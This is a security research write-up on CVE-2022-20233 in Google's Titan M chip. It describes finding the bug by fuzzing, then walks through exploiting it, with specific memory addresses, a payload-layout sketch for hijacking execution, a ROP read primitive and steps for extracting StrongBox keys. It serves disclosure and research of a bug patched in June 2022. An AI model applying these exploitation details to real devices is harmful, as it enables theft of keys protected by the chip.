Introduction

Titan M is a security chip that Google has included in its Pixel smartphones since the Pixel 3. Over the past 18 months, Damiano Melotti, Maxime Rossi Bellom, and Philippe Teuwen have examined it. They presented their findings at Black Hat EU 2021, among other venues, together with a whitepaper summarising the background knowledge gathered during the first phase of this research. This article covers the most recent firmware vulnerability they found in the chip, CVE-2022-20233. We first describe how the vulnerability was found through emulation-based fuzzing with AFL++ in Unicorn mode. We then walk through its exploitation, with all its difficulties, which eventually led to code execution on the chip.

Background

Google introduced Titan M in its Pixel devices in 2018. The main goal was to mitigate side-channel and hardware tampering attacks by reducing the attack surface available to attackers. Indeed, the chip is a separate system-on-a-chip (SoC) in the device. It runs its own firmware and communicates with the Application Processor (AP) over the SPI bus. It implements a number of APIs that strengthen the phone’s most security-sensitive features, such as secure boot or a hardware-backed Keystore with StrongBox.

The initial stages of this project focused mainly on reverse engineering the Titan M firmware. The firmware is based on Embedded Controller (EC), a compact open-source OS for microcontrollers. EC is built around the concept of tasks, each with a fixed stack size, and it has no heap, so there is no complex dynamic allocation. As a result, Titan M has an essentially static memory layout: a given object always lives at the same address. This property will prove crucial later on.

The OS’s simplicity brings security benefits. Without dynamic allocation, a whole class of temporal memory safety bugs is ruled out. In addition, the chip’s Memory Protection Unit (MPU) is configured so that no memory region is both Writable and eXecutable at the same time. Secure boot is implemented by verifying signatures before the firmware is loaded. However, the chip has none of the standard exploit mitigations, apart from a hardcoded stack canary placed at the end of each task stack to detect overflows. Titan M is therefore fairly exposed to memory corruption bugs, so we decided to investigate how to fuzz it and look for potential vulnerabilities.

Fuzzing Titan M

Fuzzing is a well-known method for finding memory corruption bugs in code bases written in memory-unsafe languages like C. Fuzzing a security chip can be difficult, however, without access to the sources and with a lot of hardware-dependent code. We chose to investigate two strategies: black-box fuzzing and emulation-based fuzzing.

Black-box fuzzing

To better understand how it differs from emulation-based fuzzing, let’s first take a quick look at black-box fuzzing. Black-box fuzzing a target like Titan M can be relatively straightforward. All that is required is a channel to communicate with the target during testing, and a way to determine whether it crashes or enters unexpected states. In this case, earlier stages of the research had produced nosclient, a custom client that runs natively on Android. It talks directly to the kernel driver in charge of communicating with the chip. Being able to send arbitrary messages gave us a channel to Titan M. The return codes of the library functions we used served as the signal to infer what happened while those messages were processed.

Most tasks that interact with Android serialize their messages with Protobuf. Since the message definitions are open source in AOSP, we could use libprotobuf-mutator to mutate messages according to this grammar. For Nugget, one of the tasks that do not use Protobuf, we generated test cases with the good old Radamsa.

This approach did produce some interesting results, which in fuzzing terms means bugs. While fuzzing an older firmware version, we rediscovered several known issues, including the buffer overflow we had exploited in our previous study. We also found two crashes in the latest firmware version at the time. However, both were caused by the same null pointer dereference, which was not deemed critical enough to be included in an Android Security Bulletin.

Emulation-based fuzzing

Black-box fuzzing, however, gives very little feedback about what happens inside the chip. We therefore turned to an alternative strategy: emulation-based fuzzing. Using the understanding of the firmware gained from hours of reverse engineering, we set up an emulation framework. It runs the firmware instruction by instruction and lets us observe its behavior. This provides excellent feedback: a coverage-guided fuzzer can prioritize inputs that reach new code and adapt its mutations accordingly.

There are many ways to build such a solution; we ultimately chose the AFL++ fuzzing framework and the Unicorn emulation engine. Unicorn, a QEMU-based project, only provides CPU emulation; it does not emulate a full system. In our case this was an advantage rather than a limitation. Our scripts stay quite simple and can include ad-hoc adjustments to improve fault detection or work around specific problems. Unicorn also integrates well with AFL++ through its Unicorn mode, which makes it possible to fuzz pretty much anything that can be emulated with Unicorn. The only required step is to define the place_input callback, which writes each test case into the target’s memory before it is executed.
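To make the role of place_input concrete, here is a minimal, self-contained sketch. It does not use Unicorn itself. FakeUc is a hypothetical stand-in exposing a Unicorn-like mem_write(address, data), so the logic runs on its own. The callback’s parameters are modelled on the (uc, input, persistent_round, data) shape used by unicornafl’s Python bindings, where returning False rejects an input. The buffer address 0x192c8 is the default Keymaster request buffer mentioned later in this article. The memory window and the maximum request size are assumptions.

```python
KM_REQUEST_BUF = 0x192C8   # default Keymaster request buffer (from the article)
MAX_REQUEST_LEN = 0x800    # assumption: largest request the transport accepts


class FakeUc:
    """Hypothetical flat memory with Unicorn-like mem_write/mem_read methods."""

    def __init__(self, base: int, size: int) -> None:
        self.base = base
        self.mem = bytearray(size)

    def mem_write(self, address: int, data: bytes) -> None:
        off = address - self.base
        if off < 0 or off + len(data) > len(self.mem):
            raise ValueError("write to unmapped memory")
        self.mem[off:off + len(data)] = data

    def mem_read(self, address: int, size: int) -> bytes:
        off = address - self.base
        return bytes(self.mem[off:off + size])


def place_input(uc, input_data: bytes, persistent_round: int, data) -> bool:
    """Copy the fuzzer's test case into the request buffer before each run."""
    if not input_data or len(input_data) > MAX_REQUEST_LEN:
        return False  # reject inputs the real transport could not deliver
    uc.mem_write(KM_REQUEST_BUF, input_data)
    return True
```

A real harness would typically also store the input length wherever the firmware expects it, for example in a register or a length field. That part is firmware-specific and is not shown here.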

We tested other Titan M firmware features with plausible attack scenarios in mind. However, a few fuzzing campaigns targeting the SPI rescue feature produced no notable results. We therefore decided to refocus on the tasks and reproduce the experiment we had done in the black-box setting. Since AFL++ supports custom mutators, we plugged in libprotobuf-mutator once more and emulated the firmware’s Keymaster, Identity, and Weaver tasks individually. We left out AVB because of the small attack surface it exposes: most of its interactions take place while the device is in bootloader mode.

Fortunately, one crash stood out, as described below. Before getting to it, though, it is worth discussing the limitations of emulation-based fuzzing. As we all know, there is no such thing as a free lunch, and this strategy has its drawbacks too:

  • Hardware-dependent code: many functions depend on the hardware and cannot easily be emulated. They must be hooked, which inevitably reduces test coverage.
  • Bug detection: as with the plain black-box approach, without further improvements only issues that trigger Unicorn errors are detected. This misses a variety of in-page overflows, off-by-ones, etc.
  • Lack of complete system emulation: this design choice means some routines are never exercised, so some bugs are missed. For this reason, we were unable to rediscover the previously reported vulnerability.

To address the second issue, Unicorn lets us set a variety of custom hooks to track specific memory accesses or blocks of code. We implemented several heuristics to detect specific bug patterns, such as faulty memcpy calls that read from the Boot ROM (which is mapped at address 0x0). However, hooks affect performance. There is a trade-off between the time spent reverse engineering to find such patterns and the time the fuzzer actually runs freely.
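As a rough illustration of such a heuristic, the sketch below flags memcpy calls whose source or destination overlaps the Boot ROM mapped at 0x0. In a real harness, a function like this would be called from a Unicorn code hook on memcpy’s entry point. Under the ARM calling convention, it would read dst, src and size from r0, r1 and r2. Here it is a plain function so that it runs standalone. The Boot ROM size is a hypothetical value.

```python
from __future__ import annotations

BOOT_ROM_BASE = 0x0
BOOT_ROM_SIZE = 0x4000  # hypothetical size of the Boot ROM region


def overlaps(addr: int, size: int, base: int, length: int) -> bool:
    """True if [addr, addr + size) intersects [base, base + length)."""
    return addr < base + length and base < addr + size


def check_memcpy(dst: int, src: int, size: int) -> list[str]:
    """Return the suspicious patterns seen in one memcpy(dst, src, size) call."""
    findings = []
    if overlaps(src, size, BOOT_ROM_BASE, BOOT_ROM_SIZE):
        findings.append("reads from Boot ROM")
    if overlaps(dst, size, BOOT_ROM_BASE, BOOT_ROM_SIZE):
        findings.append("writes to Boot ROM")
    return findings
```

Keeping the check this cheap matters, because it would run on every memcpy call and directly eats into fuzzing throughput.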

The vulnerability

Now let’s get to the juicy part. While fuzzing the Keymaster task, we came across an interesting crash: a UC_ERR_WRITE_UNMAPPED error raised while handling an ImportKey request. At the time of the crash, the firmware was executing a strb instruction, trying to write 1 byte into unmapped memory. Note that the vulnerable code was introduced with the Google Pixel security update of May 2022.

As the Protobuf definitions show, ImportKey messages include a KeyParameters field made of one or more KeyParameter objects. The vulnerability lies in a function that iterates over this list and checks whether each parameter’s tag is 0x20005, which stands for DIGEST. When such a parameter is found, the function performs several checks. It then uses the corresponding integer field as an offset into a stack buffer and sets the byte at that offset to 1. By providing a large enough integer, it is possible to write the byte 0x01 out of bounds.
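The logic described above can be modelled in a few lines. This is a simplified sketch, not the decompiled firmware code. Memory is a flat bytearray, the intermediate checks are left out, and the function name is hypothetical. Only the DIGEST tag value and the write of 0x01 at buffer + integer come from the description.

```python
DIGEST_TAG = 0x20005  # KeyParameter tag for DIGEST, as described above


def set_digest_flags(memory: bytearray, buf_addr: int, params) -> None:
    """Hypothetical model of the vulnerable loop over KeyParameters.

    params is a list of (tag, integer) pairs. For each DIGEST parameter,
    the integer is used as an offset into the stack buffer at buf_addr,
    and the byte there is set to 1. Nothing bounds the offset to the
    buffer's size, so a large integer writes outside the buffer.
    """
    for tag, integer in params:
        if tag != DIGEST_TAG:
            continue
        memory[buf_addr + integer] = 0x01  # the out-of-bounds strb
```

In this model, writing past the end of the bytearray raises IndexError. This loosely plays the role of the UC_ERR_WRITE_UNMAPPED crash seen during fuzzing.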

The code excerpt below shows these checks and the strb instruction that performs the out-of-bounds write and causes the crash. Both the assembly and the decompiled views are included. At that point, r7 holds the buffer address, r3 holds the current KeyParameter’s integer field, and r1 is set to 0x1.

The bug can be triggered once for every parameter with a DIGEST tag, as long as the KeyParameters list stays within its maximum size. This results in multiple 1-byte out-of-bounds writes. Because of the offset checks, however, these writes are far from arbitrary. Without going into the details of the bit-wise operations, the least significant byte of the offset can only be 0x0, 0x2, or 0x4.
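The constraint on the offsets can be expressed as a simple predicate. The actual bit-wise checks are not reproduced here. This sketch only encodes their stated outcome, an offset whose least significant byte is 0x00, 0x02 or 0x04. The helper then lists which addresses a single message with several DIGEST parameters would set to 0x01. Function names are hypothetical.

```python
from __future__ import annotations

ALLOWED_LSB = {0x00, 0x02, 0x04}  # offset LSB values that pass the checks


def offset_allowed(offset: int) -> bool:
    """True if a DIGEST integer could pass the offset checks (simplified)."""
    return (offset & 0xFF) in ALLOWED_LSB


def writes_for(buf_addr: int, offsets) -> list[int]:
    """Addresses receiving 0x01 for the DIGEST integers of one message."""
    return [buf_addr + off for off in offsets if offset_allowed(off)]
```

For example, an offset of 0xa204 passes, while 0xa205 is rejected.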

At this point, the bug may look very limited and hardly exploitable. Remember, though, that Titan M’s memory layout is entirely static, as mentioned earlier. Moreover, many messages contain a KeyParameters field, so the bug can be reached through several code paths. Provided that we can write at the right location, setting a single byte to 1 can serve many purposes. These range from a simple DoS to changing a size variable somewhere in memory and causing corruption elsewhere.

Exploitation

We then wrote a small script to compute all the addresses we could potentially write to and highlight them in Ghidra. We started looking for interesting targets, and it turned out that exploiting the bug just once was enough to compromise the chip.
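The script itself is not shown in the article. The sketch below illustrates the idea without Ghidra’s API. It enumerates every address reachable from the vulnerable buffer with an allowed offset and keeps those that fall inside regions worth inspecting. The buffer address 0x14019 is the value observed in r7 during testing. The region names, bounds and maximum offset are hypothetical placeholders that would, in practice, come from the Ghidra project.

```python
from __future__ import annotations

BUF_ADDR = 0x14019              # vulnerable stack buffer (r7), from the article
ALLOWED_LSB = (0x00, 0x02, 0x04)


def reachable(buf_addr: int, max_offset: int):
    """Yield every buf_addr + offset whose offset passes the LSB check."""
    for high in range(0, max_offset + 1, 0x100):
        for lsb in ALLOWED_LSB:
            off = high | lsb
            if off <= max_offset:
                yield buf_addr + off


def interesting_targets(buf_addr: int, max_offset: int,
                        regions: dict[str, tuple[int, int]]) -> dict[str, list[int]]:
    """Map each region name to the reachable addresses inside [start, end)."""
    hits: dict[str, list[int]] = {}
    for addr in reachable(buf_addr, max_offset):
        for name, (start, end) in regions.items():
            if start <= addr < end:
                hits.setdefault(name, []).append(addr)
    return hits
```

With a hypothetical region spanning 0x1e200 to 0x1e240, only 0x1e219, 0x1e21b and 0x1e21d are reachable. This shows how sparse the writable set is.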

What to overwrite

During our tests, we found that in the vulnerable code the buffer address held in r7 is 0x14019. Offsetting it by 0xa204 reaches 0x1e21d; note that the least significant byte of this offset, 0x04, passes the checks. This address belongs to the KEYMASTER_SPI_DATA structure, which holds information about how Keymaster messages are exchanged with Android. In particular, it contains the pointer to where incoming Keymaster requests are stored, 0x192c8 by default. Writing 0x1 at 0x1e21d overwrites a single byte of that pointer, so its value becomes 0x101c8. The consequences for Titan M are severe: subsequent Keymaster requests are stored far from where they should be.
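The arithmetic behind this single-byte corruption can be checked with a short sketch. It assumes the request pointer is a 32-bit little-endian value starting at 0x1e21c. This address is inferred from the numbers above, since writing 0x01 to the pointer’s second byte turns 0x192c8 into 0x101c8. The full layout of the structure is not described here.

```python
import struct

BUF_ADDR = 0x14019          # r7 in the vulnerable code
OFFSET = 0xA204             # DIGEST integer; its LSB 0x04 passes the checks
PTR_ADDR = 0x1E21C          # inferred start of the request-buffer pointer
DEFAULT_REQ_BUF = 0x192C8   # default value of that pointer


def corrupt_pointer() -> int:
    """Return the pointer value after the single out-of-bounds write."""
    target = BUF_ADDR + OFFSET
    # Little-endian image of the pointer as stored in memory: c8 92 01 00.
    raw = bytearray(struct.pack("<I", DEFAULT_REQ_BUF))
    raw[target - PTR_ADDR] = 0x01  # the one byte set by the bug
    return struct.unpack("<I", bytes(raw))[0]
```

After the write, the bytes in memory read c8 01 01 00, so the pointer becomes 0x101c8.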

The UART console

Before attempting to exploit this bug, let’s briefly recap how we interact with the chip. Our only tool is nosclient, which lets us craft any message and send it straight to the driver. Titan M answers a request with a return code and a response, which is empty in case of error. With only this information at hand, writing an exploit is extremely difficult. There are no debugging tools, and no way to examine stack traces or the immediate effects of an attack.

This is where the UART console exposed by the microcontroller comes in handy. There are two ways to reach it, each with its own difficulties. The first relies on a special debugging cable called SuzyQable. This cable is officially meant for debugging Chrome OS microcontrollers. Since Titan M is based on the same OS, it turns out to work with Titan M as well. To enable it, we boot the Pixel into fastboot mode and run the command fastboot oem citadel suzyq on. Once the device is connected with the SuzyQable, we can access the UART console from our laptop.

The cable also allows adb communication with the device at the same time. Unfortunately, the channel is closed whenever the chip crashes, or even after a reboot command is sent over this console. The device must then be brought back to fastboot mode to enable the interface again. Since this is very impractical, we took the alternative route.

The second option is the MacGyver solution. Titan M’s UART pins are exposed on the motherboard, so soldering two wires is enough to get the same shell as with the cable. In this setup, the console never closes and stays operational whatever happens to the device or the chip.

Titan M chip

The Titan M console is very simple and allows quick interactions with the chip, such as looking up statistics, versions, and related information. Most importantly, however, it is where debug logs are printed. Back to exploit development: the console obviously does not tell us what went wrong when something fails, but it is still very helpful. For instance, we can always try to jump to a function that prints something and check whether the exploit works up to that point.

Hijacking execution flow

As mentioned previously, the out-of-bounds write changes the address where incoming Keymaster requests are stored. Since this new region is still within the chip’s memory, incoming messages overwrite whatever data already resides there. We therefore experimented with sending increasingly large commands while watching the UART logs. After some trial and error, we found that placing a valid code address at offset 556 of the payload let us jump to it. This effectively redirects execution to a function of our choice, as some logs printed in the UART terminal revealed.
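A sketch of how such a request payload could be laid out follows: controllable bytes up to offset 556, then the code address to jump to. The target address used below is a hypothetical placeholder. Setting bit 0 assumes a Thumb-only Cortex-M core, on which an address loaded into pc must have that bit set. Both points are assumptions rather than details of the actual exploit.

```python
import struct

RET_OFFSET = 556  # offset at which a code address is used as a jump target


def build_payload(target: int, prefix: bytes = b"", filler: bytes = b"A") -> bytes:
    """Put `prefix` first, pad up to RET_OFFSET, then append the jump address."""
    if len(filler) != 1:
        raise ValueError("filler must be a single byte")
    if len(prefix) > RET_OFFSET:
        raise ValueError("prefix does not fit before the hijacked address")
    pad = filler * (RET_OFFSET - len(prefix))
    # Assumption: Thumb-only core, so bit 0 of the branch target must be 1.
    return prefix + pad + struct.pack("<I", target | 1)
```

The prefix parameter reflects that the bytes before offset 556 remain under our control and can later hold other data.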

UART terminal

This memory area was most likely also used by some task, probably idle at the time, that had a return address stored on its stack. Our message overwrote that return address, which is how execution ended up in a function of our choice. But how can this be turned into a real exploit?

Return Oriented Programming

Because of the memory protections in place, writable memory is not executable, so we cannot write our own shellcode and jump to it. Instead, we had to resort to a code-reuse attack based on Return Oriented Programming (ROP). The goal was to build a read-anywhere primitive, so that a specially crafted command sent from nosclient would leak the secrets Titan M is guarding.

Unfortunately, we could not place our ROP chain right where our initial gadget address was written. Doing so would corrupt some memory and crash the chip before the exploit completed. Pivoting the stack was therefore the first challenge. Since the stack pointer moves towards higher addresses as the chain is consumed, we wanted to decrease it as much as possible. That way, the chain could rely on the payload we could fit inside those 556 bytes, which we could set freely without any side effects. We found only one gadget able to do this, and it comes with several side effects.

Nevertheless, we built a ROP chain that calls it repeatedly, making sure r0 points to a memory area we also control. We also set up a few gadgets so that its ldr and blx instructions behave as we wanted.

Impact

The leak primitive built with this exploit lets us read any readable address on the chip. As a result, we can dump the chip’s secrets, such as the Root of Trust sent by the Pixel bootloader when Titan M is updated. We also gained access to the Boot ROM, which we had never been able to read before. This works despite the chip’s slightly modified memcpy, which checks whether the src or dst buffer is 0x0. Instead of jumping to the function’s entry point, we jump straight to the basic block that performs the copy, skipping those checks.
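The difference between calling the modified memcpy and jumping into its copy loop can be modelled as follows. This is a hypothetical Python model, not the firmware’s code. The guard mirrors the described check on src and dst being 0x0, and copy_block stands for the basic block that performs the copy. Returning a bool is a modelling choice.

```python
def copy_block(mem: bytearray, dst: int, src: int, n: int) -> None:
    """Model of the basic block doing the actual copy (no checks at all)."""
    mem[dst:dst + n] = mem[src:src + n]


def titan_memcpy(mem: bytearray, dst: int, src: int, n: int) -> bool:
    """Model of the modified memcpy: refuses a src or dst equal to 0x0."""
    if src == 0 or dst == 0:
        return False  # the entry point blocks reads from the Boot ROM at 0x0
    copy_block(mem, dst, src, n)
    return True
```

Calling titan_memcpy with src = 0 copies nothing. Calling copy_block directly, which is what jumping past the checks amounts to, copies the bytes at address 0x0.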

One of the most interesting consequences of this attack is the ability to recover any StrongBox-protected key, defeating the highest level of protection offered by the Android Keystore. As with TrustZone, these keys are stored on the device as encrypted key blobs, but they can only be used inside Titan M.

The procedure is the following:

  • read a key blob from the Android OS (from any application);
  • send a valid, well-formed BeginOperation request, containing such a key blob:
    • the handler for this command decrypts the key and stores it into a specific memory address. This prepares the chip to perform the requested operation;
  • run the exploit and leak the memory where the plaintext key is now stored.
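The three steps can be summarised as a small orchestration function. Everything here is hypothetical. read_key_blob, begin_operation and leak_memory are placeholders for the file access, the nosclient request and the ROP-based read primitive. Treating a status of 0 as success is an assumption. The plaintext key’s address and length are parameters because they are not given here.

```python
from typing import Callable


def recover_strongbox_key(
    read_key_blob: Callable[[], bytes],
    begin_operation: Callable[[bytes], int],
    leak_memory: Callable[[int, int], bytes],
    key_addr: int,
    key_len: int,
) -> bytes:
    """Hypothetical orchestration of the key extraction procedure."""
    blob = read_key_blob()                 # 1. encrypted blob from the file system
    status = begin_operation(blob)         # 2. chip decrypts the key into RAM
    if status != 0:                        # assumption: 0 means success
        raise RuntimeError(f"BeginOperation failed with status {status}")
    return leak_memory(key_addr, key_len)  # 3. leak the plaintext key
```

Passing the three actions as callables keeps the sketch testable with fakes, without a device.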

To demonstrate the impact of this attack, we also wrote a mock application that simply generates a StrongBox-protected AES key and uses it to encrypt a string. Using our exploit, we can leak the corresponding key from Titan M. With the same initialization vector, we can then decrypt the string offline (or rather “off the phone”).

Reminder: this attack has two prerequisites. First, the attacker must be able to send commands to the chip, either through physical access to the SPI bus or from a rooted device (nosclient requires root).

Second, the attacker needs access to the key blobs on the Android file system. This requires either root privileges or an exploit that bypasses File Based Encryption or the uid access restrictions.

Mitigations

We reported this issue to Google, and the best mitigation is of course the patch included in the June 2022 security update. We would, however, like to draw attention to a specific feature that could have prevented the StrongBox key blob leak. An application can create an authentication-bound key by calling setUserAuthenticationRequired(true) when building it with KeyGenParameterSpec. The user must then authenticate before the key can be used. The key blob is also encrypted a second time with a key derived from the user’s password, which the attacker does not know.

Conclusion

The Titan M chip is the most secure component of Google’s Pixel phones and a cornerstone of the whole system’s security. Its good design choices and the efforts to reduce its attack surface make exploiting bugs very difficult, and suitable tools to debug the chip are lacking. Despite all this, in our project we were able to:

  • Reverse engineer the communications between Android and the chip.
  • Develop nosclient, an open-source tool that lets a researcher send arbitrary commands to the chip.
  • Discover vulnerabilities using black-box fuzzing.
  • Emulate the chip and discover a vulnerability using emulation-based fuzzing.
  • Leverage some implementation weaknesses and exploit the vulnerability to achieve code execution on the chip and exfiltrate sensitive data (cryptographic keys) that should never leave it.

The vulnerability was reported to Google in May 2022 and a fix was released in the Pixel Security update of June 2022.